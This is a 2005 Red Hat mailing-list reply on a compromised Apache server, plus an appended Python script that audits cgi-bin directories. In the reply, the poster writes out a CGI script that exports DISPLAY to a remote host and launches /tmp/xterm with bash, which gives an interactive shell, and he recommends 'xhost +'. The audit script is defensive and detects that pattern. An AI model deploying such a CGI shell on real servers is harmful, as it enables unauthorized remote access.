Blackhole
Tobias Speckbacher
TSpeckbacher at quova.com
Mon Apr 11 19:16:13 UTC 2005
> -----Original Message-----
> From: redhat-list-bounces at redhat.com [mailto:redhat-list-
> bounces at redhat.com] On Behalf Of Chris Kenward
> Sent: Monday, April 11, 2005 8:15 AM
> To: 'General Red Hat Linux discussion list'
> Subject: RE: Blackhole
>
> Hi there, Tom
>
> > Is it possible that you have some shell accounts on your system
> > and that one of your users is trying to run this? The C code by
> > itself won't harm anything, and from what you say, it does not
> > appear to have been compiled. Perhaps just upgrading to the newest
> > apache will fix? Looking at the links provided below seem to
> > indicate that the executable must be run, to try to break the apache
> > server through the listed port. I've seen this attempt many times
> > on my machine, & AFAIK, it's never been successful.
>
> I don't think anyone local to the machine would do something like that -
> we only allow FTP access to the server and no users have telnet or SSH
> access.
Shell access is not necessary; the web server itself can essentially
serve as a shell. Easy enough to write a CGI script to execute all the
commands necessary.
Hell, even getting a shell is trivial:
First we grab an xterm binary from a compatible system, drop it
wherever we have access, set permissions, yada yada yada. Unless of
course the admin was kind enough to install it for us, which I have seen
plenty of times.
We will name the following script xterm.cgi, or whatever extension you
have set to execute, and drop it into my web site's cgi-bin directory.
Of course this will not work if the web server is properly firewalled,
which in my experience they hardly ever are.
#!/bin/bash
export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash
If you try this, don't forget to add the host to your X server's ACL or
simply run xhost +.
A web server will let you do just about anything you want ...
-Tobias
>
> The Apache web server is latest version from the RHN (2.0?)
>
> I've taken the bull by the proverbials and deleted the file called
> "blackhole". Can't find anything else suspicious and looking through the
> various ports that are active doesn't really show anything suspicious.
>
> Whew?
>
> Regards
> Chris
>
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
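As an added defender-side example (not part of the thread), a small Python audit that walks a cgi-bin directory and flags scripts showing the pattern Tobias describes: DISPLAY exported to a remote host and a binary launched from a world-writable directory such as /tmp. The sample scripts and the 192.0.2.10 address are constructed placeholders.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample scripts (not from the original mail): one ordinary CGI
# and one following the pattern described in the thread, with a TEST-NET
# placeholder in place of the remote X server address.
SAMPLES = {
    "hello.cgi": "#!/bin/bash\necho 'Content-type: text/plain'\necho\nuptime\n",
    "xterm.cgi": "#!/bin/bash\nexport DISPLAY=192.0.2.10:0.0\n/tmp/xterm -e /bin/bash\n",
}

# DISPLAY pointed at some host (name or address) rather than a local ":0".
DISPLAY_EXPORT = re.compile(r"\bDISPLAY\s*=\s*([\w.\-]+):\d+(?:\.\d+)?")
# Any reference to a path under a world-writable directory: a dropped
# binary has to live somewhere the web server account can write.
TMP_PATH = re.compile(r"(?:^|[\s;&|=])((?:/tmp|/var/tmp|/dev/shm)/\S+)")
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

def audit_script(text):
    """Return (line number, finding, detail) tuples for one script's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DISPLAY_EXPORT.search(line)
        if m and m.group(1) not in LOCAL_HOSTS:
            findings.append((lineno, "remote-display", m.group(1)))
        m = TMP_PATH.search(line)
        if m:
            findings.append((lineno, "tmp-path", m.group(1)))
    return findings

def audit_cgi_dir(cgi_dir):
    """Audit every regular file in a cgi-bin directory; map name -> findings."""
    report = {}
    for path in sorted(Path(cgi_dir).iterdir()):
        if path.is_file():
            findings = audit_script(path.read_text(errors="replace"))
            if findings:
                report[path.name] = findings
    return report

def demo():
    """Write the constructed samples into a scratch cgi-bin and audit it."""
    with tempfile.TemporaryDirectory() as cgi_dir:
        for name, body in SAMPLES.items():
            Path(cgi_dir, name).write_text(body)
        return audit_cgi_dir(cgi_dir)

if __name__ == "__main__":
    for name, findings in demo().items():
        for lineno, kind, detail in findings:
            print(f"{name}:{lineno}: {kind} {detail}")
```

Point `audit_cgi_dir` at a real cgi-bin to get the same report for the scripts there; a hit is a prompt to read the script, not proof of compromise.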